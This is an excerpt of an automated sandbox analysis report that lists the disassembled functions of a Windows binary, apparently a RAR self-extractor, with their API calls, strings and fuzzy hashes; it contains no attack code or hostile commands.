                                                              Function 0044CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 0044CB66
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C71E
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C730
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C742
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C754
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C766
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C778
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C78A
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C79C
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7AE
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7C0
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7D2
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7E4
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7F6
                                                              • _free.LIBCMT ref: 0044CB5B
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 0044CB7D
                                                              • _free.LIBCMT ref: 0044CB92
                                                              • _free.LIBCMT ref: 0044CB9D
                                                              • _free.LIBCMT ref: 0044CBBF
                                                              • _free.LIBCMT ref: 0044CBD2
                                                              • _free.LIBCMT ref: 0044CBE0
                                                              • _free.LIBCMT ref: 0044CBEB
                                                              • _free.LIBCMT ref: 0044CC23
                                                              • _free.LIBCMT ref: 0044CC2A
                                                              • _free.LIBCMT ref: 0044CC47
                                                              • _free.LIBCMT ref: 0044CC5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: hE
                                                              • API String ID: 161543041-2023966264
                                                              • Opcode ID: 29b11b68a20f8104ec6f2a904a5ad64da65d5282e31131117d9ad6fd2a7b99a6
                                                              • Instruction ID: 8071db56ce898022d935c745a10464a2f1b88e08c2c7d5b20f5eb1cf03e7f757
                                                              • Opcode Fuzzy Hash: 29b11b68a20f8104ec6f2a904a5ad64da65d5282e31131117d9ad6fd2a7b99a6
                                                              • Instruction Fuzzy Hash: 23313B71A022459FFB61AA7AE886B5B77E9EF10314F18441FE548D7292DF39AC40CB18
                                                              Function 004496F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00449705
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 00449711
                                                              • _free.LIBCMT ref: 0044971C
                                                              • _free.LIBCMT ref: 00449727
                                                              • _free.LIBCMT ref: 00449732
                                                              • _free.LIBCMT ref: 0044973D
                                                              • _free.LIBCMT ref: 00449748
                                                              • _free.LIBCMT ref: 00449753
                                                              • _free.LIBCMT ref: 0044975E
                                                              • _free.LIBCMT ref: 0044976C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: 0dE
                                                              • API String ID: 776569668-3691849534
                                                              • Opcode ID: 72166e0ed47cd4fc919aaad7f54670f61db66faa0d9f4a8291c4c190d93dd25e
                                                              • Instruction ID: 261a9c0ae643efe4aaa12fad8aec958f07bf2b003ef83a2c8db8f6d1aecc3505
                                                              • Opcode Fuzzy Hash: 72166e0ed47cd4fc919aaad7f54670f61db66faa0d9f4a8291c4c190d93dd25e
                                                              • Instruction Fuzzy Hash: A711FBB6501009BFDB01EF95C842CDD3B75EF24354B5150AAFA084F272DE35DE509B88
                                                              Function 00439711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00439736
                                                              • _wcslen.LIBCMT ref: 004397D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004397E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00439806
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0043982D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: FjunC$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-2049243416
                                                              • Opcode ID: e32ec433c39493a455f84c0674f3f4f287fc80f88447c521fce7157948cc4c71
                                                              • Instruction ID: f4fbccd7e5609e8285bbd4cdc296cb9a9836447269c29fb4fce20108914e31d4
                                                              • Opcode Fuzzy Hash: e32ec433c39493a455f84c0674f3f4f287fc80f88447c521fce7157948cc4c71
                                                              • Instruction Fuzzy Hash: 1C316C321097017AE725AF359C06F5F7798DF86725F10041FF501962C2EBAC9E0983AD
                                                              Function 0043D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 0043D6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0043D6ED
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0043D709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0043D720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0043D734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0043D75D
                                                              • DeleteObject.GDI32(00000000), ref: 0043D764
                                                              • GetWindow.USER32(00000000,00000002), ref: 0043D76D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 38f3031f988d68bde73608e55e20643d74b782614a926512e85210a8542d4786
                                                              • Instruction ID: 6fe768e2c7269c0a84f26e5068b4196fad692b015255a2162e7d6db74a05172d
                                                              • Opcode Fuzzy Hash: 38f3031f988d68bde73608e55e20643d74b782614a926512e85210a8542d4786
                                                              • Instruction Fuzzy Hash: 99112772A403107BE2207F75AC4AFAF765CAB49B06F00553AFA81A51D1D76C8B0546AD
                                                              Function 00442E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: c73c581fdfe64c37f44788b6550b6b546bf4a958c617d0902f598a706518bb8a
                                                              • Instruction ID: b5c781ce7f68f6e152f4c5dd975f0cf74ff02a1764cf5ef7e2aba151f3b1111f
                                                              • Opcode Fuzzy Hash: c73c581fdfe64c37f44788b6550b6b546bf4a958c617d0902f598a706518bb8a
                                                              • Instruction Fuzzy Hash: 43B17771800209EFEF24DFA5C9819AFBBB5BF04716F54415BF8016B202D779EA11CB99
                                                              Function 0042AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nC
                                                              • API String ID: 3519838083-476071384
                                                              • Opcode ID: 52fe3efb26023ab999735f3a489fa6456f279f3d4dd86679ac3ddcf34857f82d
                                                              • Instruction ID: 0661f0b9c80d14ea341d0b27f37bbf850f7ab3926ad94fe44c9e5414bd41c45b
                                                              • Opcode Fuzzy Hash: 52fe3efb26023ab999735f3a489fa6456f279f3d4dd86679ac3ddcf34857f82d
                                                              • Instruction Fuzzy Hash: 86719E70B00629AFDB14DF64DC959AFB7B8FF48355B14016EF902A72A1CB38AD02CB54
                                                              Function 00426FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00426FAA
                                                              • _wcslen.LIBCMT ref: 00427013
                                                              • _wcslen.LIBCMT ref: 00427084
                                                                • Part of subcall function 00427A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00427AAB
                                                                • Part of subcall function 00427A9C: GetLastError.KERNEL32 ref: 00427AF1
                                                                • Part of subcall function 00427A9C: CloseHandle.KERNEL32(?), ref: 00427B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: bebb17417139d23807474c25389b1dccd166df68cd01592a0cdfa647b1b6a385
                                                              • Instruction ID: a2848f832674765d542f46488a4ff1a3a1cf83ac40c5c0a1a6a3d0b7272669b8
                                                              • Opcode Fuzzy Hash: bebb17417139d23807474c25389b1dccd166df68cd01592a0cdfa647b1b6a385
                                                              • Instruction Fuzzy Hash: AB41ECB1F04364BAEB20EB71AC42FEF776C5F05348F40445BFD45A6282D67C6A588729
                                                              Function 0043B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043B610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0043B637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0043B650
                                                              • SetWindowTextW.USER32(?,?), ref: 0043B661
                                                              • GetDlgItem.USER32(?,00000065), ref: 0043B66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0043B67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0043B694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: 5d19388e36c3a706f846303a5e39971636a713443012e21de0e50863cbb63d61
                                                              • Instruction ID: f625d716c8721deef58847dc67a683fe650ce74a5cb39b18330aa3cf1186a64b
                                                              • Opcode Fuzzy Hash: 5d19388e36c3a706f846303a5e39971636a713443012e21de0e50863cbb63d61
                                                              • Instruction Fuzzy Hash: F321B431204204BBE2119F66EC4AF3F3B6DEB4AF46F01442EF604965E1DB5A9901977E
                                                              Function 0043FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,1D081F23,00000001,00000000,00000000,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0043FE1F
                                                              • _com_issue_error.COMSUPP ref: 0043FE48
                                                              • _com_issue_error.COMSUPP ref: 0043FE52
                                                              • GetLastError.KERNEL32(80070057,1D081F23,00000001,00000000,00000000,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FE57
                                                              • _com_issue_error.COMSUPP ref: 0043FE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,0042AF6C,ROOT\CIMV2), ref: 0043FE80
                                                              • _com_issue_error.COMSUPP ref: 0043FE93
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: a6d0bb5b35ddbb3ee6df8851d08a2a65f80f69a96ea2fdc5f39ef2bc5c2f3884
                                                              • Instruction ID: ab322801649930dcee482bf4e858e536177c7602eadfaebcdfa499039640b028
                                                              • Opcode Fuzzy Hash: a6d0bb5b35ddbb3ee6df8851d08a2a65f80f69a96ea2fdc5f39ef2bc5c2f3884
                                                              • Instruction Fuzzy Hash: AE41C871E00315ABD7109F65CC46BAFBBA8EB4CB55F20423FF905E7292D738990487A9
                                                              Function 00429382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00429387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004293AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004293C9
                                                                • Part of subcall function 0042C29A: _wcslen.LIBCMT ref: 0042C2A2
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              • _swprintf.LIBCMT ref: 00429465
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 004294D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00429514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              • Opcode ID: 878f8c2d5d0431f9dc234d33dc7ecb2acda152127712c6a5190df09d49cf6064
                                                              • Instruction ID: 86f0027e6e15789e1f83435778aaada7eb8711cd072da20dddc7836335b004e0
                                                              • Opcode Fuzzy Hash: 878f8c2d5d0431f9dc234d33dc7ecb2acda152127712c6a5190df09d49cf6064
                                                              • Instruction Fuzzy Hash: 0D416572B00274B5CF21AF61AC459DF737CAF45744F8048ABB509A3151DA3C8FC98B68
                                                              Function 00421100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: UC$pC$zC
                                                              • API String ID: 176396367-2289992426
                                                              • Opcode ID: 878016647095381f72e429dfbca2e7a281f75699c9596ad312764e4e6c4b1de7
                                                              • Instruction ID: 0f84a01d83ec3f71011702481239e03ce28057f76ad08d51db8f4bb2b8e62a50
                                                              • Opcode Fuzzy Hash: 878016647095381f72e429dfbca2e7a281f75699c9596ad312764e4e6c4b1de7
                                                              • Instruction Fuzzy Hash: FF410771A006299BCB219F68DC069EF7BB8EF05711F00002EFD46F7255DB34AE458BA8
                                                              Function 00439ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00439EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00439F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00439FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00439FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00439FF9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: C$RarHtmlClassName
                                                              • API String ID: 3937224194-3570579450
                                                              • Opcode ID: d4c775911476c75d4669a26cd8dfb9e0516d69e8c5bd0f770a20a122b526f0d6
                                                              • Instruction ID: f70b96f89f313b894722732176532a7785f86eb837a1e316a444a3b73f5c0b3b
                                                              • Opcode Fuzzy Hash: d4c775911476c75d4669a26cd8dfb9e0516d69e8c5bd0f770a20a122b526f0d6
                                                              • Instruction Fuzzy Hash: 8C41CF31004210AFDB219F64DC8CB6FBBB8FB48B06F00592EF94999152DB78DD15CB6A
                                                              Function 00431218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 0043122E
                                                                • Part of subcall function 0042B146: GetVersionExW.KERNEL32(?), ref: 0042B16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00431251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00431263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00431274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004312CF
                                                              • __aullrem.LIBCMT ref: 00431379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
